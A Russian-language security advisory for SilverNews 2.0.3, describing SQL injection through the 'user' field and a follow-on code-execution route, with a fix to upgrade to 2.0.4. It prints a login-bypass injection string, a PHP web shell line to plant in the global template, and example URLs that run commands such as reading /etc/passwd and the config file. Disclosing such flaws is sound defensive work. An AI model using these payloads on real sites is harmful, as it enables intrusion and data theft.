Дата публикации: | 05.08.2005 |
Дата изменения: | 27.02.2009 |
Всего просмотров: | 1206 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Неавторизованное изменение данных Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | SilverNews 2.x |
Уязвимые версии: SilverNews 2.0.3
Описание: Уязвимость существует из-за недостаточной обработки входных данных в переменной user при выключенной опции magic_quotes. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды на целевой системе. Пример: user: ' or isnull(1/0) /* pass: whateverПолучив административные привилегии, злоумышленник может отредактировать специальным образом глобальный шаблон '/templates/tpl_global.php'. Пример: //*********************************************** </body> </html> TEMPLATE; } } system($HTTP _GET_VARS[command]);И, затем, с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера. Примеры: http://[target]/[path]//templates/tpl_global.php?command=ls%20-la http://[target]/[path]/templates/TPL_GLOBAL.PHP?command= cat%20/etc/passwd http://[target]/[path]/templates/TPL_GLOBAL.PHP?command= cat%20/[path_to_config_file]/data.inc.php URL производителя: Решение: Установите последнюю версию 2.0.4 с сайта производителя. Журнал изменений:
27.02.2009 |
|
Ссылки: | SilverNews Input Validation Holes Let Remote Users Inject SQL Commands and Remote Authenticated Users Execute System Commands |
|
http://www.rgod.altervista.org/silvernews.html |